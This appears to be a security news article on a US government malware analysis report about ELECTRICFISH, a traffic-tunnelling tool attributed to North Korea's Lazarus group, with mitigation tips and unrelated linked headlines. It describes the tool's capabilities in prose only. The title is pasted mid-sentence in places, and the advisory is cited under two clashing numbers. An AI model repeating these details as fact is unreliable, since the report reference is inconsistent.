North Korean Hackers Use ELECTRICFISH Malware to Steal Data. The Federal Bureau of Investigation (FBI) and the U.S. Department of Homeland Security (DHS) have issued a joint malware analysis report (MAR) on a malware strain dubbed ELECTRICFISH and used by the North-Korean APT group Lazarus to ex-filtrate data from victims.
According to the MAR AR19-129A advisory released on US-CERT’s website, the malware was detected while tracking the malicious activities of the North Korean-backed hacking group HIDDEN COBRA (also known by security experts as Lazarus, Guardians of Peace, ZINC, and NICKEL ACADEMY).
The MAR-10135536-21 malware analysis report was issued “to enable network defense and reduce exposure to North Korean government malicious cyber activity.”
As further detailed in the ELECTRICFISH advisory North Korean Hackers Use ELECTRICFISH Malware to Steal Data:
This MAR includes malware descriptions related to HIDDEN COBRA, suggested response actions and recommended mitigation techniques. Users or administrators should flag activity associated with the malware and report the activity to the Cybersecurity and Infrastructure Security Agency (CISA) or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation.
The report published on the US-CERT website comes with a detailed analysis of one malicious 32-bit executable file found to be infected with Lazarus’ ELECTRICFISH malware.
The malware “implements a custom protocol that allows traffic to be funneled between a source and a destination Internet Protocol (IP) address. The malware continuously attempts to reach out to the source and the designation system, which allows either side to initiate a funneling session.”
North Korean Hackers Use ELECTRICFISH Malware to Steal Data
Because the malware can be configured by the Lazarus group attackers “with a proxy server/port and proxy username and password,” it makes it possible to connect “to a system sitting inside of a proxy server” and thus circumventing the infected system’s authentication.
After bypassing the configured authentication measures on the compromised machine, ELECTRICFISH will “establish a session with the destination IP address, located outside of the target network and the source IP address.”
Once a connection is established between a source IP address and a destination IP address, North Korean Hackers Use ELECTRICFISH Malware to Steal Data. The ELECTRICFISH malware can funnel Internet traffic between the two machines allowing the malicious actors to funnel the information collected from compromised computers to servers that they control.
Malware analysis reports are issued by the DHS via US-CERT to “provide organizations with more detailed malware analysis acquired via manual reverse engineering.”
Full analysis for the ELECTRICFISH sample as well as a full list of IOCs are available within the AR19-100A advisory. The IOCs can also be downloaded as an XML document from HERE.
How to avoid infection
Aside from keeping their antivirus signatures up-to-date, the advisory recommends:
- patching operating systems and restricting permissions to install and run unwanted software;
- thinking twice before opening email attachments, and be cautious when using removable media;
- admins should disable file- and printer-sharing services or at least use strong passwords or Active Directory authentication if leaving them on.
Computer Programming Business Requirements Analysis(Opens in a new browser tab)
WhatsApp hacked after attackers install spyware on people’s phone(Opens in a new browser tab)
A Cisco Router Bug Has Massive Global Implications(Opens in a new browser tab)
Grand theft consciousness: How quantum algorithms will backdoor human-level AI(Opens in a new browser tab)
It’s Almost Impossible to Tell if Your iPhone Has Been Hacked(Opens in a new browser tab)
‘Space Invaders’ The Board Game Celebrates 40 Years Of The Arcade Classic(Opens in a new browser tab)
Windows 10 gets Arch Linux, one of the trickiest distros around(Opens in a new browser tab)
WiFi Password Hacking for Beginners(Opens in a new browser tab)
Thousands of Android apps have been creating a permanent record of everything you do(Opens in a new browser tab)
Russian hackers are eight times faster than North Korean groups(Opens in a new browser tab)
RBC customer out of pocket after fraud: What you need to know if you e-transfer money(Opens in a new browser tab)
ATM hacking has gotten so easy, the malware’s a game(Opens in a new browser tab)
AI is the future: Microsoft wants to usher it in responsibly(Opens in a new browser tab)
Tesla Autopilot stopped for a rabbit on the road caught on video, owner claims(Opens in a new browser tab)
Cybersecurity burnout: 10 most stressful parts of the job(Opens in a new browser tab)
Fake Google reCAPTCHA used to hide Android banking malware(Opens in a new browser tab)
How to Spy on Competitors with Python & Data Studio(Opens in a new browser tab)
Java, PHP or .NET Which programming languages will earn you the most?(Opens in a new browser tab)